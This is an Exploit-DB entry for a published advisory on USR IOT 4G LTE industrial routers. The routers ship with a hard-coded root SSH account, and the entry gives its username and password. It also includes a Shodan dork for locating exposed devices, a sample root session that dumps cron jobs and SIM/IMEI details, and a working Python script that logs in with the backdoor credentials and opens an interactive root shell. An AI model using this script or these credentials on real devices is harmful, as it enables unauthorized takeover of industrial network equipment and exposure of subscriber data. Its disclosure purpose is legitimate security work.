USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor

EDB-ID:

50894

CVE:

N/A




Platform:

Hardware

Date:

2022-05-11


# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
# Exploit Author: LiquidWorm

#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
#                   1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*"  // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd"  && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# lqwrm@metalgear:~$ 
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
#            OpenWrt/Linaro GCC 4.8-2014.04
#            Ralink SoC MT7628 PCIe RC mode
#            BusyBox v1.22.1
#            uhttpd
#            Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#


import paramiko as bah
import sys as baaaaaah

bnr='''
        ▄• ▄▌.▄▄ · ▄▄▄  ▪        ▄▄▄▄▄        
        █▪██▌▐█ ▀. ▀▄ █·██ ▪     •██          
        █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄  ▐█.▪        
        ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·        
▄▄▄▄·  ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀    ▄▄▄  
▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪     ▪     ▀▄ █·
▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄  ▄█▀▄ ▐▀▀▄ 
██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
·▀▀▀▀  ▀  ▀ ▄▄▄▀ ·▀  ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀  ▀
            ▀▄ █·▪     ▪     •██              
            ▐▀▀▄  ▄█▀▄  ▄█▀▄  ▐█.▪            
            ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·            
         ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·      
        ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.      
        ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄     
        ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█     
         ▀  ▀ ·▀▀▀ ·▀▀▀  ▀▀▀  ▀▀▀▀  ▀▀▀▀      
'''
print(bnr)

if len(baaaaaah.argv)<2:
    print('--Gief me an IP.')
    exit(0)

adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'

rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
    rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
    print('--Got rewt!')
except:
    print('--Backdoor removed.')
    exit(-1)

while True:
    cmnd=input('# ')
    if cmnd=='exit':
        rsh.exec_command('exit')
        break
    stdin,stdout,stderr = rsh.exec_command(cmnd)
    print(stdout.read().decode().strip())

rsh.close()